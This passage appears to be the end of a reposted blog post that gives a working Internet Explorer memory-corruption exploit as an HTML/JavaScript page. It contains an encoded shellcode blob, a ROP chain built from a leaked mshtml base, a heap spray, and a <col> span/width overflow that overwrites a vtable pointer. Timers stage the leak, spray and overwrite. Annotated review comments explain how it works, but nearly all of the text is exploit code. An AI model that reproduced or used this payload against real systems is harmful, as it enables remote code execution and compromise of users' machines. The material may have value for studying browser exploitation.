    
            var code = unescape("%u40b0%u414b%u1d24%ub4a8%u7799%ube37%ua947%ud41a%u353f%ueb30%ud133%u2ae1%u31e0%ue2d3%u1514%ufd13%u3497%u7a7b%ufc39%u92ba%u9390%u0a4e%ubbf5%u8db2%ue385%uf823%ud53a%u0448%u750d%ud632%u707c%u4642%u7e78%ub12c%u2f98%u1c3c%u727e%u3b7b%u4fe0%ue38c%u4f76%u81b0%u2de2%u35ba%u86bb%u67f8%u8d0c%u9190%u7574%u7f71%u7d3c%u9f15%ub347%ud50b%u784e%u4970%u1b37%uc1ff%uc6fe%uc0c7%ub6d4%u9246%ub4b1%uf588%ua91d%u7c4b%u2548%u7a99%u9b3d%u01b7%u34eb%u1cb5%u38a8%ub8fc%ud609%ube4a%u9714%ue121%ub904%u42b2%u7796%u6924%u80f9%u0dfd%u412c%u2f05%u273f%ubf40%u9893%u7343%u6679%u77a8%ub63f%u7472%u707b%u843d%uebd2%uf630%ubfd5%u71b2%u757a%u1848%u0cf5%u96b7%uf889%u764a%u9b2d%u92b0%u66be%u7d97%ub425%u9114%u4904%uba34%u421c%ue308%uf902%u4140%u4773%u0d27%u93b5%u2299%u1dd4%u7c4f%u2867%u98fc%u2c24%ue212%ufd03%u78a9%u3505%u8390%u2fe0%u4337%u154b%u468d%u79b9%u297f%ubbd6%u197e%u4ee1%u9fb8%ub1b3%u4a3c%u7a7d%u7679%u4670%u2091%u74e1%ub043%u4e71%ub590%u75b7%u983c%u4bb3%ud687%uf86b%u9b40%u117f%ud1f7%u7bf9%u152f%u3427%u1d92%u3d97%u2d49%u720d%u014f%u7ce0%u3105%u10eb%u35f5%ub4b6%u1c2c%u93b2%u4704%ud52b%ubbb1%ue389%u4137%u7e78%u733f%u7742%u2925%ufcd0%u6624%u8dba%u67b9%u1a96%ua8fd%ua9be%ud40b%u4899%u9f14%u87bf%ue2f7%ub80c%u903d%u14b0%u25bb%u7d96%u1a7f%u79f5%uf809%u347c%u7b91%u4e47%ueb81%ue122%ud41b%u7074%ub21d%u2d72%u928d%ub3b1%ua905%u71b4%u4b0c%u9343%u0d76%u989f%u84b5%ub7d5%u4666%ube40%ub8bf%u201c%u48e2%u4a73%u6b2c%u2afc%u04e0%u4941%u3777%u10ba%u7ed6%u332f%ub9fd%u7a9b%u7875%u2415%u1299%uf9d2%u3f97%ub63c%u3567%u27a8%ue386%u7742%u4f73%ue380%ua93c%u757c%uf62b%ud0c0%u27e0%u214b%ue1d3%ub93f%u157d%u8c14%ue2c1%u9904%u7498%u7071%u6637%ueb28%u4e1c%u7fb6%u357b%u3297%u25d4%uf569%u9105%u4047%u0224%u78d6%u7941%uba3d%u49b1%u7276%u1d2f%u85bf%u67fc%u7e92%u4a2c%u7ab4%u1348%u93d5%u8d9b%u03bb%u74fd%u0879%u43e1%ue083%u1873%u46e3%u2372%ub2f8%u88b0%ub8f9%u969f%u75b5%u770c%u7b42%ub72d%u7aa8%ue219%ueb38%ub334%u90be%u4f7e%u0d7f%ub3b6%u3076%ubff5%u479f%u7167%ud40a%u3b7c%u66fc%u41b7%u9615%u3dfd%u3505%ub825%u1c7d%ub54
a%u3940%u37d6%u3f92%u971d%u1478%u8d49%ua8b2%u3493%u2c3c%u902f%ud54f%u04a9%u1198%u91f8%ub99b%u9943%ubbb1%u0d70%u4824%u4b0c%ube4e%ub02d%uf93a%u27ba%ub446%udb42%ud9d1%u2474%u5af4%uc929%u49b1%u8cbe%uc04a%u31a0%u1972%uc283%u0304%u1572%ubf6e%u483c%u40e7%u89bd%uc997%ub858%uae85%ue929%ua419%u027c%ue8d2%u9194%u2496%u129a%u131c%ua395%u9b91%u6779%u67b0%ub480%u5912%uc94b%u9e53%u22b6%u7701%u91bc%ufcb5%u2980%ud2b4%u128e%u57ce%ue650%u5964%u5781%u11f3%ud339%u825b%u3038%ufeb8%u3d73%u740a%u9782%u7543%ud7b4%u480f%uda78%u8c4e%u05bf%ue625%ub8c3%u3d3d%u66b9%ua0c8%uec19%u016a%u219b%uc2ec%u8e97%u8c7b%u11bb%ua6a8%u9ac0%u694f%ud841%uad6b%uba09%uf412%u6df7%ue62b%ud150%u6c89%u0672%u2eab%ueb1b%ud081%u63db%ua392%u2ce9%u2c08%ua442%uab96%u9fa5%u236e%u2058%u6d8e%u749f%u05de%uf536%ud5b5%u20b7%u8619%u9b17%u76d9%u4bd8%u9cb1%ub4d7%u9ea1%udd3d%u644b%u22d6%u6723%ucb43%u6831%u579a%u8ebc%u77f6%u19e8%ue16f%ud2b1%uee0e%u9f6c%u6411%u5f82%u8ddf%u73ef%u7d88%u2eba%u811f%u4411%u17a0%ucf9d%u8ff7%u369f%u103f%u1d60%u994b%udef4%ue624%udf18%ub0b4%udf72%u64dc%u8c26%u6af9%ua0f3%uff51%u90fb%ua806%u1e93%u9e70%ue03c%u1e57%u3701%ua49e%u3d73%u64f2");
            // Serialise the ROP chain (built against the leaked mshtml base) and
            // prepend it to the encoded shellcode. NOTE(review): this `var rop_chain`
            // shadows the nested function of the same name; it still works because
            // the call goes through heapobj.rop_chain, captured above.
            var rop_chain = heapobj.tab2uni(heapobj, heapobj.rop_chain(mshtmlbase)) ;
            var shellcode = rop_chain + code
    
            // Grow the payload past 100000 chars by doubling, then build a block of
            // 16 x 32768 chars (16 x 64 KiB = 1 MiB) minus 19 chars (38 bytes). The
            // subtraction presumably leaves room for the string's length prefix,
            // terminator and allocator header so each copy stays 1 MiB-aligned —
            // not verified here.
            while (shellcode.length < 100000)
            shellcode = shellcode + shellcode;
            var onemeg = shellcode.substr(0, 64*1024/2);
            for (i=0; i<14; i++) {
            onemeg += shellcode.substr(0, 64*1024/2);
            }
    
            onemeg += shellcode.substr(0, (64*1024/2)-(38/2));
            var spray = new Array();
    
            // 400 copies of the ~1 MiB block; the value written over the vtable by
            // smash_vtable (0x07070024) is expected to fall inside this region.
            // `i` is assigned without `var` here and so becomes a global.
            for (i=0; i<400; i++) {
            spray[i] = onemeg.substr(0, onemeg.length);
            }
        }
    
        // Second overflow (last timer): re-trigger the column-array overrun on the
        // same <col>, this time with a width chosen so that the per-column value
        // (width*100 = 117899300 = 0x07070024, per the GetPixelWidth annotation in
        // the analysis) overwrites the vtable pointer of the object the write-up
        // places after the array (CButtonLayout). 0x07070024 lies in the sprayed
        // region, so the next virtual call on that object lands in the ROP chain.
        // span="44" sets how many 0x1C-byte entries are written past the end.
        function smash_vtable(){
                var obj_col_0 = document.getElementById("132");
                obj_col_0.width = "1178993";                    // smash the vftable 0x07070024
                obj_col_0.span = "44";                      // the amount to overwrite
        }
    
        // Filled in by over_trigger and read by heap_spray when building the ROP
        // chain. NOTE(review): it starts as "" (a string), so if the leak fails the
        // `mshtmlbase + Number(...)` terms in rop_chain become string concatenation
        // and the spray is silently garbage — there is no guard for that case.
        var mshtmlbase = "";
        // Staging by timers: leak first, then spray, then overwrite the vtable.
        // The delays (1/400/700 ms) are tuned rather than synchronised; on a slow
        // machine the spray may not be complete when smash_vtable fires.
        setTimeout("over_trigger();",1);    
        setTimeout("heap_spray();",400);
        setTimeout("smash_vtable();",700);
    
            </script>
            </body>
            </html>
  • 原文地址:https://www.cnblogs.com/snip3r/p/9677546.html